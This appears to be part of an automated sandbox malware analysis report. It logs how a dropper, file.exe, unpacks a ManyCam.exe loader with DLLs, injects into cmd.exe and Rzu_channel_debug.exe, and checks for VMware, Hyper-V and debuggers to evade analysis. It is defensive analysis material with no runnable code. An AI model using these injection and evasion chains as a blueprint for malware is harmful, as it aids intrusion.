                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cximagecrt.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\highgui099.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\CrashRpt.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cxcore099.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cv099.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ydoicpxmibxJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\cv099.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\highgui099.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\dbghelp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cxcore099.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\dbghelp.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\cximagecrt.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\dawfefqddjbxJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeFile created: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\ydoicpxmibxJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\dawfefqddjbxJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YDOICPXMIBX
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DAWFEFQDDJBX
                  Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init CvBoxFilter::init 3_2_00B9A3E0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeAPI/Special instruction interceptor: Address: 6CDB7C44
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeAPI/Special instruction interceptor: Address: 6CDB7C44
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeAPI/Special instruction interceptor: Address: 6CDB7945
                  Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6CDB3B54
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeAPI/Special instruction interceptor: Address: 6C777C44
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeAPI/Special instruction interceptor: Address: 6C777945
                  Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C773B54
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ydoicpxmibxJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dawfefqddjbxJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-21041
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7684Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7680Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7780Thread sleep time: -55504s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe TID: 7968Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6BDDB0 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00007FF6EF6BDDB0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D3000 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,swprintf,SetDlgItemTextW,FindClose,swprintf,SetDlgItemTextW,SendDlgItemMessageW,swprintf,SetDlgItemTextW,swprintf,SetDlgItemTextW,0_2_00007FF6EF6D3000
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E4150 FindFirstFileExA,0_2_00007FF6EF6E4150
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,1_2_004164A0
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_004164A0 lstrlenW,FindFirstFileW,GetFullPathNameW,SetLastError,3_2_004164A0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D5F78 VirtualQuery,GetSystemInfo,0_2_00007FF6EF6D5F78
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                  Source: Rzu_channel_debug.exe, 0000000B.00000003.2320487418.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2370328312.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2309309798.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2342963938.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2270513933.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2283066654.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000002.2370571330.000000000040C000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2331116179.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2359786629.0000000000485000.00000004.00000020.00020000.00000000.sdmp, Rzu_channel_debug.exe, 0000000B.00000003.2343858401.0000000000485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                  Source: ManyCam.exe, 0000000C.00000002.2154639347.000000000446F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                  Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-22809
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6DBB94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6EF6DBB94
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_0052309D IsProcessorFeaturePresent,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapAlloc,InterlockedCompareExchange,GetProcessHeap,HeapFree,1_2_0052309D
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6E51D0 GetProcessHeap,0_2_00007FF6EF6E51D0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D6894 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6EF6D6894
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D756C SetUnhandledExceptionFilter,0_2_00007FF6EF6D756C
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6DBB94 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6EF6DBB94
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D7388 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6EF6D7388
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_00523722
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeCode function: 1_2_00BDBBB6 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,1_2_00BDBBB6
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeCode function: 3_2_00523722 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_00523722

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtOpenKeyEx: Direct from: 0x7FF6DB5BC1FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB5EDDFDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB683E9BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationProcess: Direct from: 0x7FF6DB5A0912Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationToken: Direct from: 0x7FF6DB5B87C9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF66098B236
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Indirect: 0x14012000F
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB6CE54EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF66087D448Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF66087D282Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtDeviceIoControlFile: Direct from: 0x7FF6DB5EC9BEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF66098C8D9
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF66085D0CA
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6609934AE
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtDeviceIoControlFile: Direct from: 0x7FFE221C26A1
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF6DB6CC8B7
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6607B5082
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB6D1DC3Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x14011D808
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB4F93ABJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF6DB5BC96AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6607B93AB
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtReadVirtualMemory: Direct from: 0x7FF6DB6C778CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB6CB664Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB4F5082Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF66098C8B7
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF6DB6C7AD9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB59D0CAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB59F625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF6DB5BD282Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF6DB6CA345Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeNtQuerySystemInformation: Direct from: 0x76EF63E1Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF6DB5BD448Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF6DB59AF91Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6608ADDB5
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF66087CED4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB689E88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF66098C8CB
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF660993586
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB68744AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationToken: Direct from: 0x7FF6608A68DA
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB6160DFJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationProcess: Direct from: 0x7FF660860912
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF66098E54E
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB58EB16Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x14011D864
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateThreadEx: Direct from: 0x7FF6DB4F51E6Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF6608612A8
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5E
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF66098A345Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB68379BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF660991DC3
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF66085B177
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtReadFile: Direct from: 0x7FF6DB59B270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtSetInformationProcess: Direct from: 0x7FF6DB5A1B38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF66087C96AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationProcess: Direct from: 0x7FF66086105B
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6608AA16D
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB58EF22Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6608D60DF
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB6847FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtSetInformationProcess: Direct from: 0x7FF6DB5A0828Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB6D34AEJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtOpenKeyEx: Direct from: 0x7FF66087C1FCJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeNtSetInformationThread: Direct from: 0x6D51245DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationToken: Direct from: 0x7FF6608787C9
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF660987AD9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB59B177Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6608ADDFD
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateThreadEx: Direct from: 0x7FF6607B51E6
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF6DB6CC8CB
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtRequestWaitReplyPort: Direct from: 0x7FF6DB594869Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryValueKey: Direct from: 0x7FF6DB5BCED4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF6DB5E90E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtReadFile: Direct from: 0x14011D832Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF6DB5EA16DJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB6D3586Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF66084EF22
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x14011D7A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtReadFile: Direct from: 0x7FF66085B270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtSetInformationProcess: Direct from: 0x7FF660860828
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtCreateFile: Direct from: 0x7FF66085AF91Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB6CB236Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB58F3D9Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationProcess: Direct from: 0x7FF6DB5A105BJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF6DB6865FDJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF6DB6CC8D9
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtSetInformationProcess: Direct from: 0x7FF660861B38
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x7FF66098B664
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtProtectVirtualMemory: Direct from: 0x7FF66085F625
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQueryInformationToken: Direct from: 0x7FF6DB5E68DAJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtReadVirtualMemory: Direct from: 0x7FF66098778C
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtAllocateVirtualMemory: Direct from: 0x140120A3C
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtQuerySystemInformation: Direct from: 0x7FF66084EB16
                  Source: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeNtClose: Direct from: 0x7FF6DB5A12A8
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 2E5010Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 14011BC08Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe base: 365010Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6EF6D23F0 SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,swprintf,GetLastError,GetLastError,GetTickCount,swprintf,GetLastError,GetModuleFileNameW,swprintf,CreateFileMappingW,GetCommandLineW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,swprintf,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_00007FF6EF6D23F0
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exeJump to behavior
